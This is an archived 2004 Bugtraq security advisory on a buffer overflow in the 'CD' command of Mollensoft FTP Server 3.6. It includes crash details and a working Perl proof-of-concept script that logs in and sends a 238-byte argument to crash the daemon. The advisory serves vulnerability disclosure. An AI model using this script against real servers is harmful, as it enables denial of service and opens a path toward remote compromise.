'Mollensoft ftp Server ver 3.6 Buffer overflow'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Mollensoft ftp Server ver 3.6 Buffer overflow
From:       Chintan Trivedi <chesschintan () hotmail ! com>
Date:       2004-05-28 5:38:45
Message-ID: 20040528053845.14885.qmail () www ! securityfocus ! com
[Download RAW message or body]




[ Mollensoft ftp Server ver 3.6 Buffer overflow ]

-----------------------------------------------------
EOS Advisory - http://www.eos-india.net
-----------------------------------------------------


Vendor         : http://www.mollensoft.com
Version	       : 3.6 (latest) 
Vulnerability  : Buffer Overflow


About Product 
=============

	Mollensoft Lightweight FTP Server is a powerful, reliable FTP server for \
Windows95/98/NT/2000. It includes New Security and Faster, More Efficient Rules Based \
Access, Live Client activity Window as well as a specific Client breakdown window \
(below) and significant enhancement in speed/stability and is especially designed for \
Intranet Use!

(direct quote from website)

Description
===========

	A buffer overflow vulnerability exists in its "CD" command which can lead to READ \
any memory location. An attacker can pass a string of 238 bytes to the "CD" command \
to cause this overflow. 

ftp> CD AAAAAAA...(238 times)

The ftpd deamon at this point crashes with an error message saying 

"The instruction at 0x50e0931f referenced memory at 0x41414141. The memory could not \
be read."

	On debugging the process, the instruction at memory location "0x50E0931F" is found \
to be "CMP BYTE PTR DS:[ESI], 1F" And the register ESI contains "41414141". So \
basically the application is trying to READ from 0x41414141. Thus in this manner an \
attacker can force the application to READ from any memory location. In worst cases \
if properly exploited the vulnerability can also lead to a remote exploit giving \
complete access to the vulnerable system. 

Proof Of Concept
================

# C:\Active Perl\perl
# POC for mollensoft ftp server 3.6
# Will crash the deamon

use IO::Socket::INET;

$host = "localhost";
$port = 21;
$buffer = "A" x 238;

$socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);

print $socket "USER root\r\n";
$socket->recv($test,100);
print $test;

print $socket "PASS password\r\n";
$socket->recv($test,100);
print $test;

print $socket "CD $buffer\r\n";
$socket->recv($test,100);
print $test;

close($socket);


Credits
=======

Chintan Trivedi - chesschintan [at] hotmail.com 
http://www.eos-india.net
Eye on Security Research Group - India


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic